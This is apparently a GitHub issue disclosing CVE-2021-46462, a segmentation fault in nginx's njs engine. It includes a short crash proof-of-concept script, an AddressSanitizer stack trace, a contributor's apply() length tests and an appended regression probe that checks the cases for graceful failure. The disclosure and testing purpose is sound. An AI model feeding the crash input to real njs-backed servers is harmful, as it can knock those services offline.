CVE-2021-46462: SEGV /njs/src/njs_object.c:2136:24 in njs_object_set_prototype · Issue #449 · nginx/njs
njs through 0.7.1, used in NGINX, was discovered to contain a segmentation violation via njs_object_set_prototype in /src/njs_object.c.
Env
Version : 0.7.0
Git Commit : 2da5d8b246b806bee6f74b575217ec3b61a25548
OS : Ubuntu 20.04
Configure : ./configure --address-sanitizer=YES
POC
function main() {
    // Small dense array whose length is then set far above its real element
    // count, turning it into a huge sparse array.
    const v3 = [23490,23490,23490,23490];
    const v4 = {};
    v3.length = 1577595327;
    // Use the oversized array as the argument list of Function.prototype.apply,
    // then install the result as v3's prototype; the crash is raised from
    // njs_object_set_prototype during this __proto__ assignment (see the stack dump).
    const v9 = Object.apply(...v4, v3);
    v3.__proto__ = v9;
}
main();
Stack Dump
AddressSanitizer:DEADLYSIGNAL
=================================================================
==466519==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x00000050d6d4 bp 0x7ffc8e2432f0 sp 0x7ffc8e2432e0 T0)
==466519==The signal is caused by a READ memory access.
==466519==Hint: this fault was caused by a dereference of a high value address (see register values below). Dissassemble the provided pc to learn which register was used.
#0 0x50d6d4 in njs_object_set_prototype /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_object.c:2136:24
#1 0x50d6d4 in njs_object_prototype_proto /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_object.c:2162:19
#2 0x4d9f03 in njs_value_property_set /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_value.c:1215:19
#3 0x4e45f5 in njs_vmcode_interpreter /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:658:23
#4 0x53ae40 in njs_function_lambda_call /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_function.c:701:11
#5 0x4e4648 in njs_vmcode_interpreter /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vmcode.c:783:23
#6 0x4dea17 in njs_vm_start /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_vm.c:493:11
#7 0x4c7f3d in njs_process_script /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_shell.c:881:19
#8 0x4c7375 in njs_process_file /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_shell.c:615:11
#9 0x4c7375 in main /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_shell.c:315:15
#10 0x7f3d5b6190b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#11 0x41dabd in _start (/home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/build/njs+0x41dabd)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/anonym0us/Git/fuzzilli-njs/njs-origin/njs/src/njs_object.c:2136:24 in njs_object_set_prototype
==466519==ABORTING
Credit
P1umer, afang5472, Kotori of NeSE@IIE
drsm (Contributor) commented Dec 24, 2021
maybe related:
>> (() => {}).apply({}, Array(2**10));
undefined
>> (() => {}).apply({}, Array(2**13));
Thrown:
RangeError: Maximum call stack size exceeded
    at Function.prototype.apply (native)
    at main (shell:1)
>> (() => {}).apply({}, Array(2**30));
undefined
>> (() => {}).apply({}, Array(2**32));
Thrown:
RangeError: Invalid array length
    at Array (native)
    at Function.prototype.apply (native)
    at main (shell:1)
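The argument-count cases in the comment above, plus the PoC's own length, packaged as a regression probe. This is an added example, not code from the issue or from the njs project: it runs each case under try/catch and classifies the outcome, so a rebuilt njs binary can be checked for "returns or throws a RangeError" rather than "segfaults". It uses only syntax the PoC itself already relies on (arrow functions, spread, const), so it should run both in the njs shell and under Node; the outcomes asserted below are Node's reference behaviour, and the njs outputs quoted in the comment differ from them (2**30 succeeds in njs), so treat the two engines as something to compare, not as interchangeable.

```javascript
// Added regression probe for oversized Function.prototype.apply argument lists.
// Not from the original issue or the njs project. Run with `node probe.js` or
// `njs probe.js`; Node is the reference engine for the expected outcomes.

// Call an empty function through apply() with a sparse array of `len`
// arguments. Array(len) allocates nothing per element, so building the array
// is cheap; the engine's limits only bite when apply() materialises the list.
function probeApply(len) {
  try {
    const args = Array(len);
    (() => {}).apply({}, args);
    return "ok";
  } catch (e) {
    return e instanceof RangeError ? "RangeError" : "other:" + e.name;
  }
}

// The PoC from the report, wrapped so that an engine which does not crash
// reports how it fails instead. The vulnerable njs build reached the
// __proto__ assignment (see the stack dump); V8 throws a TypeError on `...v4`
// first, because a plain object is not iterable, so apply() never runs there.
function probePoc() {
  try {
    const v3 = [23490, 23490, 23490, 23490];
    const v4 = {};
    v3.length = 1577595327;
    const v9 = Object.apply(...v4, v3);
    v3.__proto__ = v9;
    return "ok";
  } catch (e) {
    return e instanceof RangeError ? "RangeError" : "other:" + e.name;
  }
}

// Run every case. `graceful` is true when each outcome is one of the
// accepted failure modes; a segfault never gets this far, so a missing
// report line is itself the finding when run against a vulnerable build.
function runProbes() {
  // Lengths from the discussion above (2^10, 2^13, 2^30, 2^32) and the PoC.
  const lengths = [1024, 8192, 1073741824, 4294967296, 1577595327];
  const results = lengths.map((len) => ({ len: len, outcome: probeApply(len) }));
  results.push({ len: "poc", outcome: probePoc() });
  const accepted = ["ok", "RangeError", "other:TypeError"];
  const graceful = results.every((r) => accepted.indexOf(r.outcome) !== -1);
  return { results: results, graceful: graceful };
}

const report = runProbes();
report.results.forEach((r) => console.log(r.len + ": " + r.outcome));
console.log(report.graceful ? "all cases handled gracefully" : "unexpected outcome");
```

If a case is missing from the printed report, the process died inside that probe; run the same file under the ASan-instrumented `njs` from the Env section to get the stack for it.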